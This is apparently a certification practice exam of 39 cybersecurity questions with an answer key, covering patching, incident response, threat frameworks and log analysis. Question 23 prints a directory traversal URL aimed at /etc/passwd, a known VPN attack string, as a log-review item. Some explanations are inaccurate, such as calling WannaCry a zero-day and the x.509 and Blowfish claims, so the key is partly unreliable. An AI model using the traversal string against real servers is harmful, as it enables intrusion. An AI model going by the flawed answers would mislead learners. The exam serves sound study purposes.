JasonDion Practice Exam 2

Question 1

In a network vulnerability assessment report, several zero-day and critical vulnerabilities were discovered. Why might this necessitate immediate action?

A. Because they indicate a need to hire more staff.
B. Because they signal a need to decrease the frequency of vulnerability assessments.
C. Because zero-day and critical vulnerabilities improve the system’s performance.
D. These vulnerabilities present significant risk due to no current security fix being available.

Answer 1

D. These vulnerabilities present significant risk due to no current security fix being available.

Zero-day and critical vulnerabilities are high-risk issues that can severely compromise a system’s security. One example of a zero-day virus that caused significant havoc is the “WannaCry” ransomware. It exploited a vulnerability in the Windows operating system, spreading rapidly across networks and encrypting files, demanding ransom payments in exchange for decryption. These types of vulnerabilities are significant threats, not performance enhancers. While additional resources might be needed for vulnerability management, the presence of critical vulnerabilities doesn’t directly indicate staffing needs. On the contrary, critical vulnerabilities might suggest a need for more frequent and thorough assessments.

Question 2

You need to determine the best way to test operating system patches in a lab environment before deploying them to your automated patch management system. Unfortunately, your network has several different operating systems in use, but you only have one machine available to test the patches on. What is the best environment to utilize to perform the testing of the patches before deployment?

A. Choose a few existing workstations to test the patches.
B. Sandboxing.
C. Bypass testing and deploy patches directly into the production environment.
D. Virtualization.

Answer 2

D. Virtualization.

When you have a limited amount of hardware resources to utilize but have a requirement to test multiple operating systems, you should set up a virtualized environment to test the patch across each operating system before deployment. You should never deploy patches directly into production without testing them first in the lab even on just a few workstations.

Question 3

Your organization is a financial services company. You have a team of security analysts who are responsible for gathering and analyzing intelligence about potential threats to your organization. The analysts recently published a report that identifies a new threat actor who is targeting financial services companies. The report includes information about the threat actor’s tactics, techniques, and procedures (TTPs). In which phase of the security intelligence cycle will this information be provided to those who need to act on it?

A. Dissemination
B. Analysis
C. Feedback
D. Collection

Answer 3

A. Dissemination

The dissemination phase refers to publishing information produced by analysis to consumers who need to develop the insights. The collection phase is usually implemented by administrators using various software suites, such as security information and event management (SIEM). This software must be configured with connectors or agents that can retrieve data from sources such as firewalls, routers, IDS sensors, and servers. The analysis phase focuses on converting collected data into useful information or actionable intelligence. The final phase of the security intelligence cycle is feedback and review, which utilizes both intelligence producers and intelligence consumers’ input. This phase aims to improve the implementation of the requirements, collection, analysis, and dissemination phases as the life cycle is developed.

Question 4

Dion Training has just suffered a website defacement of its public-facing webserver. The CEO believes the company’s biggest competitor may have done this act of vandalism. The decision has been made to contact law enforcement so that evidence can be collected properly for use in a potential court case. Laura is a digital forensics investigator assigned to collect the evidence. She creates a bit-by-bit disk image of the web server’s hard drive as part of her evidence collection. What technology should Laura use after creating the disk image to verify the copy’s data integrity matches that of the original web server’s hard disk?

A. AES
B. 3DES
C. SHA-256
D. RSA

Answer 4

C. SHA-256

SHA-256 is the Secure Hash Algorithm with a 256-bit length output. This is one of the most common hash algorithms in use and is employed in many applications and protocols. SHA-256 and other hashing algorithms are used to ensure the data integrity of a file has not been altered. RSA, 3DES, and AES are all encryption algorithms. These algorithms can ensure confidentiality but not integrity.

Question 5

An attacker recently compromised an e-commerce website for a clothing store. Which of the following methods did the attacker use to harvest an account’s cached credentials when the user logged into an SSO system?

A. Golden ticket
B. Lateral movement
C. Pass the hash
D. Pivoting

Answer 5

C. Pass the hash

Pass the Hash (PtH) is the process of harvesting an account’s cached credentials when the user logs in to a single sign-on (SSO) system. This would then allow the attacker to use the credentials on other systems, as well. A golden ticket is a Kerberos ticket that can grant other tickets in an Active Directory environment. Attackers who can create a golden ticket can use it to grant administrative access to other domain members, even to domain controllers. Lateral movement is an umbrella term for a variety of attack types. Attackers can extend their lateral movement by a great deal if they can compromise host credentials. Pivoting is a process similar to lateral movement. When attackers pivot, they compromise one central host (the pivot) that allows them to spread out to other hosts that would otherwise be inaccessible.

Question 6

You are working as a junior cybersecurity analyst and utilize a SIEM to support investigations into ongoing incidents. The SIEM is configured to collect data from numerous sources across the network, including network sensors, routers, switches, firewalls, hosts, and servers. Unfortunately, due to the number of data sources, you have data about a particular event being detected by different sensors and devices. Which of the following must you ensure to make sense of all the data being collected by your SIEM before analyzing it?

A. Data correlation
B. Data retention
C. Data recovery
D. Data sanitization

Answer 6

A. Data correlation

Data correlation is the first step in making sense of data from across numerous sensors. This will ensure the data is placed concerning other pieces of data within the system. For example, if your IDS detected an incident, host logs were collected, and your packet capture system collected the network traffic, the SIEM could be used to correlate all three pieces of information from these different systems to allow an analyst to understand the event better. By conducting data correlation, it allows an analyst to identify a pattern more clearly and take action. Data correlation should be performed as soon as the SIEM indexes the data.

Question 7

Your organization has implemented several cybersecurity tools, but there is a lack of coordination among the team in managing and facilitating automation. Which of the following actions would most effectively address this issue?

A. Buying more tools.
B. Limiting team access to tools.
C. Ongoing automation.
D. Establishing clear roles and responsibilities for managing automation.

Answer 7

D. Establishing clear roles and responsibilities for managing automation.

Establishing clear roles and responsibilities ensures everyone knows who is in charge of what parts of the automation process, reducing confusion and increasing coordination. Ignoring automation would be counterproductive. Automation can help improve efficiency and free up staff to focus on more complex tasks. Limiting team access to tools can lead to silos, inhibit teamwork, and reduce overall efficiency in managing and facilitating automation. Simply buying more tools doesn’t necessarily improve coordination among the team. It may add complexity and could actually worsen the issue without proper management and integration.

Question 8

You are reviewing the latest list of important web application security controls published by OWASP. Which of these items is LEAST likely to appear on that list?

A. Leverage security frameworks and libraries.
B. Implement identity and authentication controls.
C. Obscure web interface locations.
D. Implement appropriate access controls.

Answer 8

C. Obscure web interface locations.

The least likely option to appear in the list is to obscure web interface locations. This recommendation is based on security through obscurity and is not considered a good security practice. The other options are all considered best practices in designing web application security controls and creating software assurance in our programs.

Question 9

When applying patches as part of vulnerability management, why is it crucial to communicate the patching schedule and potential impacts to relevant stakeholders?

A. To help management make effective risk base decisions on system disruptions due to patching.
B. To increase the company’s profitability.
C. To improve the company’s marketing strategies.
D. To enable stakeholders to plan company-wide meetings.

Answer 9

A. To help management make effective risk base decisions on system disruptions due to patching.

This communication allows stakeholders to understand potential impacts on system availability and to plan activities accordingly, reducing disruptions. Patching schedules have little to do with marketing strategies; the main goal is to manage system availability and reduce disruptions. While secure operations can contribute to profitability, communicating about patching specifically aims to manage system downtime and business impact. While communication is essential in any organization, the purpose of discussing patching schedules specifically is to manage potential system downtime.

Question 10

Nicole’s organization does not have the budget or staff to conduct 24/7 security monitoring of their network. To supplement her team, she contracts with a managed SOC service. Which of the following services or providers would be best suited for this role?

A. MSSP
B. IaaS
C. PaaS
D. SaaS

Answer 10

A. MSSP

A managed security service provider (MSSP) provides security as a service (SECaaS). IaaS, PaaS, and SaaS (infrastructure, platform, and software as a service) do not include security monitoring as part of their core service offerings. Security as a service or a managed service provider (MSP) would be better suited for this role. This question may seem beyond the exam scope. Still, the objectives allow for “other examples of technologies, processes, or tasks about each objective may also be included on the exam although not listed or covered” in the objectives’ bulletized lists. The exam tests the equivalent of 4 years of hands-on experience in a technical cybersecurity job role. The content examples listed in the objectives are meant to clarify the test objectives and should not be construed as a comprehensive listing of this examination’s content. Therefore, questions like this are fair game on test day. That said, your goal isn’t to score 100% on the exam; it is to pass it. Don’t let questions like this throw you off on test day. If you aren’t sure, take your best guess and move on!

Question 11

During the massive SolarWinds supply chain attack of 2020, cybersecurity professionals worldwide had to react quickly to protect their networks. A specific annual cybersecurity conference often hosts a capture-the-flag (CTF) event where participants are challenged to solve a series of real-world scenarios for practicing their incident response skills. Which conference is this?

A. Pwn2Own
B. RSA Confernece
C. Black Hat
D. DEF CON

Answer 11

D. DEF CON

DEF CON is one of the world’s largest and most notable hacker conventions, held annually in Las Vegas, Nevada. Its capture-the-flag (CTF) event is a competitive and practical exercise in incident response. Pwn2Own is a computer hacking contest held annually at the CanSecWest security conference. However, its main focus is on discovering new vulnerabilities, not on incident response exercises. While the Black Hat conference is another renowned cybersecurity event, its primary focus is on revealing new vulnerabilities, not on practical incident response exercises like CTF. RSA Conference is a series of IT security conferences, but it does not host the capture-the-flag events for practical incident response exercises.

Question 12

You are conducting a quick nmap scan of a target network. You want to conduct an SYN scan, but you don’t have raw socket privileges on your workstation. Which of the following commands should you use to conduct the SYN scan from your workstation?

A. nmap -sS
B. nmap -sT
C. nmap -sX
D. nmap -O

Answer 12

B. nmap -sT

The nmap TCP connect scan (-sT) is used when the SYN scan (-sS) is not an option. You should use the -sT flag when you d not have raw packet privileges on your workstation or if you are scanning an IPv6 network. This flag tells nmap to establish a connection with the target machine by issuing the connect system call instead of directly using an SYN scan. Normally, a fast scan using the -sS (SYN scan) flag is more often conducted, but it requires raw socket access on the scanning workstation. The -sX flag would conduct a Xmas scan where the FIN, PSH, and URG flags are used in the scan. The -O flag would conduct an operating system detection scan of the target system.

Question 13

You identified a critical vulnerability in one of your organization’s databases. You researched a solution, but it will require the server to be taken offline during the patch installation. You have received permission from the Change Advisory Board to implement this emergency change at 11 pm once everyone has left the office. It is now 3 pm; what action(s) should you take now to best prepare for implementing this evening’s change? (SELECT ALL THAT APPLY)

A. Validate the installation of the patch in a staging environment.
B. Ensure all stakeholders are informed of the planned outage.
C. Identify any potential risks associated with installing the patch.
D. Take the opportunity to install a new feature pack that has been requested.
E. Document the change in the change management system.
F. Take the server offline at 10 pm in preparation for the change.

Answer 13

A. Validate the installation of the patch in a staging environment.
B. Ensure all stakeholders are informed of the planned outage.
C. Identify any potential risks associated with installing the patch.
E. Document the change in the change management system.

You should send out a notification to the key stakeholders to ensure they are notified of the planned outage this evening. You should test and validate the patch in a staging environment before installing it on the production server. You should identify any potential risks associated with installing this patch. You should also document the change in the change management system. You should not take the server offline before your change window begins at 11 pm, which could affect users who are relying on the system. You should not take this opportunity to install any additional software, features, or patches unless you have received approval from the Change Advisory Board (CAB).

Question 14

Dion Training wants to install a new accounting system and is considering moving to a cloud-based solution to reduce cost, reduce the information technology overhead costs, improve reliability, and improve availability. Your Chief Information Officer is supportive of this move since it will be more fiscally responsible. Still, the Chief Risk Officer is concerned with housing all of the company’s confidential financial data in a cloud provider’s network that might be shared with other companies. Since the Chief Information Officer is determined to move to the cloud, what type of cloud-based solution would you recommend to account for the Chief Risk Officer’s concerns?

A. PaaS in a hybrid cloud.
B. SaaS in a public cloud.
C. PaaS in a community cloud.
D. SaaS in a private cloud.

Answer 14

D. SaaS in a private cloud.

A SaaS (Software as a Service) solution best describes an accounting system or software used as part of a cloud service. This meets the CIO’s requirements. To mitigate the concerns of the Chief Risk Officer, you should use a private cloud solution. This type of solution ensures that the cloud provider does not comingle your data with other customers’ data and providers dedicated servers and resources for your company’s use only.

Question 15

During a collaboration between a startup and a multinational corporation, the signed Memorandum of Understanding (MOU) has placed some limitations on the startup’s system access. What could this potentially lead to?

A. Potentially restricting ability to fully remediate vulnerabilities.
B. Greater market visibility for the startup.
C. An increase in the cybersecurity measures employed by the multinational corporation.
D. A reduction in overall project costs.

Answer 15

A. Potentially restricting ability to fully remediate vulnerabilities.

This situation could potentially lead to the startup having a restricted ability to fully remediate vulnerabilities within their systems. Due to the limitations placed by the MOU, the startup might not have the necessary access to apply patches, make configuration changes, or implement compensating controls as swiftly or comprehensively as needed. This could increase the time it takes to remediate vulnerabilities and potentially increase their exposure to risk. While the MOU outlines the agreement between the two parties, it does not inherently lead to cost reductions. While collaborating with a large corporation may increase visibility, this is unrelated to vulnerability management. The MOU does not directly affect the cybersecurity measures of the multinational corporation.

Question 16

Ted, a file server administrator, has noticed that a large number of sensitive files have been transferred from a corporate workstation to an IP address outside of the local area network. Ted looks up the IP address and determines that it is located in a foreign country. Ted contacts his company’s security analyst, who verifies that the workstation’s anti-malware solution is up-to-date, and the network’s firewall is properly configured. What type of attack most likely occurred to allow the exfiltration of the files from the workstation?

A. Session hijacking
B. Impersonation
C. Zero-day
D. MAC spoofing

Answer 16

C. Zero-day

Since the firewall wall is properly configured and the anti-malware solution is up-to-date, this signifies that a zero-day vulnerability may have been exploited. A zero-day vulnerability is an unknown vulnerability, so a patch or virus definition has not been released yet. A zero-day vulnerability refers to a hole in software that is unknown to the vendor. Hackers then exploit this security hole before the vendor becomes aware and hurries to fix it. This exploit is therefore called a zero-day attack. Zero-day attacks can include the use of infiltrating malware, spyware or allowing unwanted access to user information.

Question 17

Which of the following tools could be used to detect unexpected output from an application being managed or monitored?

A. A behavior-based analysis tool.
B. Manual analysis.
C. A log analysis tool.
D. A signature-based detection tool.

Answer 17

A. A behavior-based analysis tool.

A behavior-based analysis tool can capture/analyze normal behavior and then alert when an anomaly occurs. Configuring a behavior-based analysis tool requires more effort to set up properly, but it requires less work and manual monitoring once it is running. Signature-based detection is a process where a unique identifier is established about a known threat so that the threat can be identified in the future. Manual analysis requires a person to read all the output and determine if it is erroneous. A log analysis tool would only be useful to analyze the logs, but it would not detect unexpected output by itself. Instead, the log analysis tool would need to use a behavior-based or signature-based detection system.

Question 18

How does timely and effective communication and reporting of vulnerabilities assist an organization in meeting the GDPR’s requirement of reporting data breaches within 72 hours of detection?

A. It ensures that all employees will always adhere to data protection regulations.
B. It proves that the organization is immune to data breaches.
C. It guarantees all vulnerabilities will be fixed within 72 hours.
D. It facilitates quicker identification of vulnerabilities enabling prompt reporting to the supervisory authority.

Answer 18

D. It facilitates quicker identification of vulnerabilities enabling prompt reporting to the supervisory authority.

By identifying and addressing vulnerabilities promptly, the organization can more effectively manage incidents and meet the GDPR’s 72-hour reporting requirement. Organizations that fail to report data breaches to the supervisory authority or to individuals affected by the breach may be subject to fines of up to €20 million or 4% of global annual turnover, whichever is greater. No organization is completely immune to data breaches, as new threats and vulnerabilities continuously evolve. While training and policies can encourage compliance, human errors or misconduct can still occur. While this would be ideal, the complexity of certain vulnerabilities may require more time for a comprehensive fix.

Question 19

During your review of the firewall logs, you notice that an IP address from within your company’s server subnet had been transmitting between 125 to 375 megabytes of data to a foreign IP address overnight each day. You have determined this has been occurring for approximately 5 days, and the affected server has since been taken offline for forensic review. Which of the following is MOST likely to increase the impact assessment of the incident?

A. Forensic review of the server required fallback to a less efficient service.
B. IP addresses and other network-related configurations were exfiltrated.
C. PII of company employees and customers was exfiltrated.
D. Raw financial information about the company was accessed.

Answer 19

C. PII of company employees and customers was exfiltrated.

If the PII (Personally Identifiable Information) of the company’s employees or customers were exfiltrated or stolen during the compromise, this would increase the incident’s impact assessment. Loss of PII is a big issue for corporations and one that might garner media attention. While all of the options presented here are bad things that could increase the impact of the assessment, loss of PII is considered the MOST likely to increase the impact dramatically. Depending on the company’s size or organization, there may also be mandatory reporting requirements, fines, or restitution that must be paid.

Question 20

What technology is NOT PKI x.509 compliant and cannot be used in various secure functions?

A. Blowfish
B. AES
C. SSL/TLS
D. PKCS

Answer 20

A. Blowfish

AES, PKCS, and SSL/TLS are all compatible with x.509 and can be used in a wide variety of functions and purposes. AES is used for symmetric encryption. PKCS is used as a digital signature algorithm. SSL/TLS is used for secure key exchange.

Question 21

You are a cybersecurity analyst for a mid-sized company. One day, you decided to perform a routine scan of your internal network using the Angry IP Scanner tool. The output returned was as follows: IP Ping Hostname Ports TTL 192.168.1.1 34 ms router.domain.com 80, 443 64 192.168.1.2 40 ms pc1.domain.com 22, 80, 443 128 192.168.1.3 Timeout pc2.domain.com - - 192.168.1.4 45 ms unknown.device 21, 23, 25, 80, 443, 3389 64 Based on this output, which of the following represents a potential indicator of compromise (IoC) that should be investigated further?

A. The open ports 80 and 443 on 192.168.1.1.
B. The timeout response from 192.168.1.3.
C. The unknown device 192.168.1.4 with multiple open ports, including 21, 23, 25, and 3389.
D. The open port 22 on 192.168.1.2.

Answer 21

C. The unknown device 192.168.1.4 with multiple open ports, including 21, 23, 25, and 3389.

The unknown device at 192.168.1.4 is a potential indicator of compromise (IoC) due to several reasons. First, the device is unknown, which suggests that it’s not a recognized system within the network, thus raising suspicions. Secondly, it has multiple ports open, including 21 (FTP), 23 (Telnet), 25 (SMTP), 80 (HTTP), 443 (HTTPS), and 3389 (RDP). These ports being open could indicate services that are vulnerable to exploitation or are already being exploited, especially when they are on an unrecognized device. The combination of an unknown device and open ports commonly used for management or data transfer warrants further investigation. The open ports 80 and 443 on 192.168.1.1 represent standard web services (HTTP and HTTPS). If 192.168.1.1 is a web server or a network device with a web-based management interface (which is common), these ports would likely be open as part of normal operation. The timeout response from 192.168.1.3 is not necessarily an indicator of compromise. It could merely be that the system was offline or unreachable at the time of the scan. The open port 22 on 192.168.1.2 is for SSH, a secure method of remote administration commonly used in many environments. Although it should be secured and monitored, its mere presence isn’t an immediate indicator of compromise.

Question 22

You conducted a security scan and found that port 389 is being used when connecting to LDAP for user authentication instead of port 636. The security scanning software recommends that you remediate this by changing user authentication to port to 636 wherever possible. What should you do?

A. Conduct remediation actions to update encryption keys on each server to match port 636.
B. Change all devices and servers that support it to port 636 since port 389 is a reserved port that requires root access and can expose the server to privilege escalation attacks.
C. Mark this as a false positive in your audit report since the services that typically run on ports 389 and 636 are identical.
D. Change all devices and servers that support it to port 636 since encrypted services run by default on port 636.

Answer 22

D. Change all devices and servers that support it to port 636 since encrypted services run by default on port 636.

LDAP can be run on either port 389 or port 636. Port 389 is the standard port for LDAP but typically runs unencrypted LDAP services over this port. Instead, you should change all devices and servers that can technically support the change to port 636 since LDAP services over port 636 are encrypted by default.

Question 23

You are conducting a review of a VPN device’s logs and found the following URL being accessed:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
https://sslvpn/dana-na/../diontraining/html5acc/teach/../../../../../../etc/passwd?/diontraining/html5acc/teach/
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Based upon this log entry alone, which of the following most likely occurred?

A. The /etc/passwd file was downloaded using a directory traversal attack.
B. The /etc/passwd file was downloaded using a directory traversal attack if input validation of the URL was not conducted.
C. An SQL injection attack caused the VPN server to return the password file.
D. A XML injection attack caused the VPN server to return the password file.

Answer 23

B. The /etc/passwd file was downloaded using a directory traversal attack if input validation of the URL was not conducted.

The exact string used here was the attack string used in CVE-2019-11510 to compromise thousands of VPN servers worldwide using a directory traversal approach. However, its presence in the logs does not prove that the attack was successful, only that it was attempted. To verify that the attacker successfully downloaded the/etc/passwd file, a cybersecurity analyst would require additional information and correlation. If the server utilizes proper input validation on URL entries, then the directory traversal would be prevented. As no SQL or XML language elements are present, this is definitely not an SQL or XML injection attack.

Question 24

You just completed an nmap scan against a workstation and received the following output:

-=-=-=-=-=-=–=-=-=-=-=-=–=-=-=-=-=-=–=-=-=-=-=-=-
# nmap diontraining012

Starting Nmap ( http://nmap.org )
Nmap scan report for diontraining012 (192.168.14.61)
Not shown: 997 filtered ports
PORT STATE
135/tcp open
139/tcp open
445/tcp open
Nmap done: 1 IP address (1 host up) scanned in 1.24 seconds
-=-=-=-=-=-=–=-=-=-=-=-=–=-=-=-=-=-=–=-=-=-=-=-=-

Based on these results, which of the following operating system is most likely being run by this workstation?

A. CentOS
B. Ubuntu
C. macOS
D. Windows

Answer 24

D. Windows

Question 25

Evaluate the following log entry:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Jan 11 05:52:56 lx1 kernel: iptables INPUT drop IN=eth0 OUT= MAC=00:15:5d:01:ca:55:00:15:5d:01:ca:ad:08:00 SRC=10.1.0.102 DST=10.1.0.10 LEN=52 TOS=0x00 PREC=0x00 TTL=128 ID=3988 DF PROTO=TCP SPT=2583 DPT=23 WINDOW=64240 RES=0x00 SYN URGP=0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Based on this log entry, which of the following statements are true?

A. An attempted connection to the telnet service was prevented.
B. An attempted connection to the ssh service was prevented.
C. The packet was blocked outbound from the network.
D. Packets are being blocked inbound to and outbound from the network.
E. MAC filtering is enabled on the firewall.
F. The packet was blocked inbound to the network.

Answer 25

A. An attempted connection to the telnet service was prevented.
F. The packet was blocked inbound to the network.

Firewall log formats will vary by vendors, but this example is a commonly used format from the Linux iptable firewall tool. This log starts with the date and time of the event and provides some key pieces of information. For example, the word “drop” shows the action this log entry recorded. In this case, the firewall dropped a packet due to an ACL rule being applied. You can also see that the packet was detected on the inbound connection over eth0, so we know that packets are being scanned and blocked when they are headed inbound to the network. Next, we see the MAC address of the source device of the packet, the source (SRC) IP address, and the destination (DST) IP address. Further down, we see the source (SPT) and destination ports (DPT). In this case, the DPT is 23 and is a well-known port for telnet. Based on this single log entry, we cannot tell if packets are also being blocked when they are attempting to leave the network or if they are blocking connections to the ssh service (port 22) is also being conducting.

Question 26

You’re an incident response team member at a prominent financial institution. A recent intrusion, such as the infamous Equifax breach, has potentially exposed customer financial data. As part of your incident response duties, you need to liaise with the legal department to address potential liabilities and discuss the way forward. What primarily makes this interaction imperative?

A. To request additional funding for cybersecurity tools.
B. To educate them about cybersecurity.
C. To ensure compliance with data breach laws.
D. To inform them of the technical details of the breach.

Answer 26

C. To ensure compliance with data breach laws.

Data breach laws and regulations require institutions to take certain actions in the event of a data breach, which could include notifying affected customers and regulatory bodies within a specific time frame. Though educating everyone about cybersecurity is beneficial, it’s not the primary reason for communicating with the legal department in this situation. The main aim is to ensure the company’s response aligns with legal requirements. Although securing funding for improved cybersecurity could be a long-term goal, it’s not the primary reason to communicate with the legal department after a breach. Legal should be involved to ensure regulatory compliance and address potential liabilities. While it’s important to share some details with the legal team, they typically do not need to know the intricate technical aspects of the breach. The focus should be more on legal implications and steps to manage potential liabilities.

Question 27

Which of the following policies should contain the requirements for removing a user’s access when an employee is terminated?

A. Data ownership policy.
B. Account management policy.
C. Data retention policy.
D. Data classification policy.

Answer 27

B. Account management policy.

Question 28

You are reverse engineering a piece of malware recovered from a retailer’s network for analysis. They found that the malicious code was extracting track data from their customer’s credit cards during processing. Which of the following types of threats would you classify this malware as?

A. Rootkit
B. Ransomware
C. Keylogger
D. POS malware

Answer 28

D. POS malware

Question 29

Which analysis framework provides a graphical depiction of the attacker’s approach relative to a kill chain?

A. Diamond Model of Intrusion Analysis
B. Lockheed Martin cyber kill chain
C. OpenIOC
D. MITRE ATT&CK framework

Answer 29

A. Diamond Model of Intrusion Analysis

The Diamond Model provides an excellent methodology for communicating cyber events and allowing analysts to derive mitigation strategies implicitly. The Diamond Model is constructed around a graphical representation of an attacker’s behavior. The MITRE ATT&CK framework provides explicit pseudo-code examples for detecting or mitigating a given threat within a network and ties specific behaviors back to individual actors. The Lockheed Martin cyber kill chain provides a general life cycle description of how attacks occur but do not deal with the specifics of how to mitigate. OpenIOC contains a depth of research on APTs but does not integrate the detections and mitigation strategy.

Question 30

Your organization’s primary operating system vendor just released a critical patch for your servers. Your system administrators have recently deployed this patch and verified the installation was successful. This critical patch was designed to remediate a vulnerability that can allow a malicious actor to execute code on the server over the Internet remotely. You ran a vulnerability scan of the network and determined that all servers are still being reported as having the vulnerability. You verified all your scan configurations are correct. Which of the following might be the reason that the scan report still showing the servers as vulnerable? (SELECT ALL THAT APPLY)

A. The wrong IP address range was scanned during your vulnerability assessment.
B. The vulnerability assessment scan is returning a false positive.
C. You conducted the vulnerability scan without waiting long enough after the patch was installed.
D. This critical patch did not remediate the vulnerability.

Answer 30

B. The vulnerability assessment scan is returning a false positive.
D. This critical patch did not remediate the vulnerability.

There are two reasonable choices presented: (1) the vulnerability assessment scan is returning a false positive, or (2) this critical patch did not remediate the vulnerability. It is impossible to know which is based on the description in the question. If the patch was installed successfully, as the question states, then it is possible that the critical patch was coded incorrectly and did not actually remediate the vulnerability. While most operating system vendors test their patches before release to prevent this, they are sometimes rushed into production with extremely critical patches. The patch does not actually remediate the vulnerability on all systems. When this occurs, the vendor will issue a subsequent patch to fix it and supersede the original patch. The other option is that the vulnerability assessment tool is incorrectly configured and is returning a false positive. This can occur when the signature used to detect the vulnerability is too specific or too generic to actually detect whether the system was patched for the vulnerability or not. The other options are incorrect, as you do not have to wait a certain period of time after installation before scanning. It is assumed that you are scanning the same IP range both times as you have verified your scan configuration.

Question 31

A vulnerability scanner has reported that a vulnerability exists in the system. Upon validating the report, the analyst determines that this reported vulnerability does not exist on the system. What is the proper term for this situation?

A. False positive
B. True negative
C. True positive
D. False negative

Answer 31

A. False positive

A false positive occurs when a scanner detects a vulnerability, but the vulnerability does not actually exist on the scanned system. A true positive occurs when a scanner detects a vulnerability, and the vulnerability exists on the scanned system. A true negative occurs when a scanner does not detect a vulnerability because the vulnerability does not exist on the scanned system. A false negative occurs when a scanner does not detect a vulnerability, but the vulnerability actually exists on the scanned system.

Question 32

What is the primary importance of the ‘Mean Time to Detect’ (MTTD) metric in the context of incident response?

A. It gauges the impact of an incident on the organization.
B. It determines the severity of an incident.
C. It measures the effectiveness of detection mechanisms.
D. It calculates the total duration of the incident response process.

Answer 32

C. It measures the effectiveness of detection mechanisms.

The MTTD metric evaluates the efficiency of an organization’s detection systems by measuring the time it takes to identify a potential incident. The MTTD metric does not directly measure the impact of an incident. It focuses on the detection capabilities of the organization. MTTD measures the time taken to detect an incident, not the severity of the incident. While MTTD contributes to the overall timeline of incident response, it specifically refers to the time from when an incident occurs to when it is detected, not the total duration of the response process.

Question 33

Which analysis framework provides the most explicit detail regarding how to mitigate or detect a given threat?

A. Diamond Model of Intrusion Analysis
B. OpenIOC
C. MITRE ATT&CK framework
D. Lockheed Martin cyber kill chain

Answer 33

C. MITRE ATT&CK framework

The MITRE ATT&CK framework provides explicit pseudo-code examples for detecting or mitigating a given threat within a network and ties specific behaviors back to individual actors. The Diamond Model provides an excellent methodology for communicating cyber events and allowing an analyst to derive mitigation strategies implicitly. The Lockheed Martin cyber kill chain provides a general life cycle description of how attacks occur but do not deal with the specifics of how to mitigate. OpenIOC contains a depth of research on APTs but does not integrate the detections and mitigation strategy.

Question 34

What is a reverse proxy commonly used for?

A. To obfuscate the origin of a user within a network.
B. Allowing access to a virtual private cloud.
C. Directing traffic to internal services if the contents of the traffic comply with the policy.
D. To prevent the unauthorized use of cloud services from the local network.

Answer 34

C. Directing traffic to internal services if the contents of the traffic comply with the policy.

A reverse proxy is positioned at the cloud network edge and directs traffic to cloud services if the contents of that traffic comply with the policy. This does not require the configuration of the users’ devices. This approach is only possible if the cloud application has proxy support. You can deploy a reverse proxy and configure it to listen for client requests from a public network, like the internet. The proxy then creates the appropriate request to the internal server on the corporate network and passes the server’s response back to the external client. They are not generally intended to obfuscate the source of communication, nor are they necessarily specific to the cloud. A cloud access security broker (CASB) can be used to prevent unauthorized use of cloud services from the local network.

Question 35

Jorge is working with an application team to remediate a critical SQL injection vulnerability on a public-facing server. The team is worried that deploying the fix will require several hours of downtime and block customer transactions from being completed by the server. Which of the following is the BEST action for Jorge to recommend?

A. Remediate the vulnerability immediately.
B. Schedule an emergency maintenance for an off-peak time later in the day to remediate the vulnerability.
C. Wait until next scheduled maintenance window to remediate the vulnerability.
D. Delay the remediation until the next major update of the SQL server occurs.

Answer 35

B. Schedule an emergency maintenance for an off-peak time later in the day to remediate the vulnerability.

Jorge should recommend that emergency maintenance windows be scheduled for an off-peak time later in the day. Since the vulnerability is critical, it needs to be remediated or mitigated as quickly as possible. But, this also needs to be balanced against the business and operational needs. Therefore, we cannot simply remediate it immediately, as this would cause downtime for this public-facing server. It is also unreasonable to accept the risk until the next scheduled maintenance window since it is a critical vulnerability. Therefore, the best way to balance the risk of the vulnerability and the outage’s risk is to schedule an emergency maintenance window and patch the server during that time.

Question 36

Which of the following attacks would most likely be used to create an inadvertent disclosure of information from an organization’s database?

A. Denial of service
B. SQL injection
C. Cross-site scripting
D. Buffer overflow

Answer 36

B. SQL injection

A SQL injection poses the most direct and more impactful threat to an organization’s database. A SQL injection could allow the attacker to execute remote commands on the database server and lead to sensitive information disclosure. A buffer overflow attack attempts to overwrite the memory buffer to send additional data into adjacent memory locations. A buffer overflow attack might target a database server, but it isn’t intended to disclose information directly. Instead, a buffer overflow attack may be used to gain initial access to a server and allow for other malicious code running. A denial of service targets the availability of the information by attempting to take the server offline. A cross-site scripting attack typically is focused on the user, not the server or database.

Question 37

While reviewing the configuration settings of your company’s IIS web servers, you notice that directory browsing is enabled. This misconfiguration could potentially expose which of the following to an attacker?

A. Your company’s financial records.
B. Your company’s user email addresses.
C. The private keys of your SSL certificates.
D. The structure and content of your web directories.

Answer 37

D. The structure and content of your web directories.

If directory browsing is enabled on a web server, it can expose the structure and content of your web directories to an attacker, potentially revealing sensitive information or giving the attacker information that could be used to exploit the server. Enabling directory browsing does not expose the private keys of your SSL certificates, as these should be stored securely and not accessible through directory browsing. Unless your company’s financial records are improperly stored in the web directories, enabling directory browsing on a web server should not expose them. Directory browsing on a web server typically wouldn’t expose user email addresses unless they were stored unsecured in the web directories, which is a separate issue.

Question 38

What control provides the best protection against both SQL injection and cross-site scripting attacks?

A. Network layer firewalls
B. Input validation
C. Hypervisors
D. CSRF

Answer 38

B. Input validation

Input validation prevents the attacker from sending invalid data to an application and is a strong control against both SQL injection and cross-site scripting attacks. A network layer firewall is a device that is designed to prevent unauthorized access, thereby protecting the computer network. It blocks unauthorized communications into the network and only permits authorized access based on the IP address, ports, and protocols in use. Cross-site request forgery (CSRF) is another attack type. A hypervisor controls access between virtual machines.

Question 39

Alexa is an analyst for a large bank that has offices in multiple states. She wants to create an alert to detect if an employee from one bank office logs into a workstation located at an office in another state. What type of detection and analysis is Alexa configuring?

A. Anomaly
B. Behavior
C. Trend
D. Heuristic

Answer 39

B. Behavior

